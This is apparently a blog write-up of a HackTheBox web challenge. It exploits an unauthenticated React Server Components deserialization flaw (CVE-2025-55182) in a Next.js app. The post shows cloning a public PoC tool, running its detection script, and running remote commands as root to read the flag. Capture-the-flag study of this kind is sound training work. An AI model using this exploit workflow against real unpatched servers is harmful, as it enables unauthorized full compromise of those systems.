Skip to main content
HashnodeEverythingCTF's

Command Palette

Search for a command to run...

HackTheBox ReactOOPS (Web challenge) — Full Walkthrough

Published
3 min read
A
Adham

ReactOOPS is a web-focused challenge that demonstrates how modern JavaScript frameworks can introduce critical backend vulnerabilities when misconfigured. In this walkthrough, we enumerate a Next.js application, identify a vulnerable React Server Components implementation, validate the issue safely, and exploit it to achieve Remote Code Execution (RCE).

This room highlights the risks of unsafe deserialization in server-side rendering environments and shows how real-world CVEs can translate directly into full system compromise.

Web Enumeration

Curling to gather some info

We begin by inspecting the application using curl to analyze response headers and identify the underlying technology stack.

──(unknown㉿kali)-[~/Downloads]
└─$ curl -v 154.57.164.74:31102                                                  
*   Trying 154.57.164.74:31102...
* Established connection to 154.57.164.74 (154.57.164.74 port 31102) from 192.168.1.9 port 54110 
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 154.57.164.74:31102
> User-Agent: curl/8.17.0
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
< x-nextjs-cache: HIT
< x-nextjs-prerender: 1
< x-nextjs-prerender: 1
< x-nextjs-stale-time: 300
< X-Powered-By: Next.js
< Cache-Control: s-maxage=31536000
< ETag: "vua23c33dghj7"
< Content-Type: text/html; charset=utf-8
< Content-Length: 22725
< Date: Tue, 17 Feb 2026 15:19:59 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5

From the headers, we identify:

  • X-Powered-By: Next.js

  • Vary: rsc (React Server Components)

This confirms that the application is running Next.js with React Server Components (RSC).

A recently disclosed vulnerability affecting specific versions of React Server Components allows unauthenticated Remote Code Execution through unsafe deserialization of server function payloads.

Vulnerability Overview

The vulnerability (CVE-2025-55182 / CVE-2025-66478) affects:

  • React Server Components versions 19.0.0 – 19.2.0

  • Packages including:

    • react-server-dom-webpack

    • react-server-dom-turbopack

    • react-server-dom-parcel

The issue arises because the server unsafely deserializes client-controlled input sent to server function endpoints.

Improper validation allows attackers to craft malicious payloads that the server interprets and executes — leading to full Remote Code Execution without authentication.

Exploitation

To test and exploit the vulnerability, we use a public proof-of-concept tool.

Downloading react2shell

git clone https://github.com/freeqaz/react2shell.git
chmod +x react2shell/*.sh

Vulnerability Detection

Before exploitation, we verify whether the target is vulnerable.

┌──(unknown㉿kali)-[~/HTB/flagweb/react2shell]
└─$ ./detect.sh http://react.htb:31102/
[*] React2Shell Detection Probe (CVE-2025-55182 / CVE-2025-66478)
[*] Target: http://react.htb:31102/

[*] HTTP Status: 500
[!] VULNERABLE - Server returned 500 with E{"digest" pattern

[*] Response body:
0:{"a":"$@1","f":"","b":"s8I48LfEDhqpCdFN5-HbU"}
1:E{"digest":"346246470"}

[!] This server is running a vulnerable version of React RSC / Next.js
[!] Upgrade to Next.js 16.0.7+ or React 19.2.1+ immediately

The detection script confirms that the application is vulnerable.

Remote Code Execution

We now attempt to execute a simple command to confirm RCE.

┌──(unknown㉿kali)-[~/HTB/flagweb/react2shell]
└─$ ./exploit-redirect.sh -q http://react.htb:31102 "whoami"
root

The server successfully executes the command, confirming full Remote Code Execution.

Enumerating the Application Directory

┌──(unknown㉿kali)-[~/HTB/flagweb/react2shell]
└─$ ./exploit-redirect.sh -q http://react.htb:31102 "pwd"

/app/.next/standalone     

┌──(unknown㉿kali)-[~/HTB/flagweb/react2shell]
└─$ ./exploit-redirect.sh -q http://react.htb:31102 "ls /app"

app
flag.txt
next-env.d.ts
next.config.mjs
node_modules
package-lock.json
package.json
postcss.config.mjs
public
tailwind.config.ts
tsconfig.json

We identify a flag.txt file inside /app.

Getting the Flag

└─$ ./exploit-redirect.sh -q http://react.htb:31102 "cat /app/flag.txt"

HTB{jus7_1n_c4s3_y0u_m1ss3d_r34ct2sh3ll___cr1t1c4l_un4uth3nt1c4t3d_RCE_1n_R34ct___CVE-2025-55182}

Flag successfully retrieved.

Although this was a relatively straightforward challenge, it demonstrates how severe the impact of real-world vulnerabilities can be when organizations fail to apply security patches in a timely manner.

In this case, an unpatched React Server Components implementation allowed unauthenticated Remote Code Execution — meaning an attacker could gain full control of the server without valid credentials AS ROOT

Even modern frameworks like React and Next.js are not immune to critical vulnerabilities. This highlights the importance of proper patch management, continuous monitoring, and staying informed about newly disclosed CVEs.

#cve-2025-55182#reactjs#javascript#react2shell#hackthebox-htb-pentest-pentester-pentesting-cybersecurity-cybersec-offensivesecurity-offsec-redteam-redteamer-redteaming-hack-hacker-hacking-ethicalhacking-ethicalhacker-informationsecurity-infosec#hackthebox#walkthrough#ctf-writeup

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

EverythingCTF's

8 posts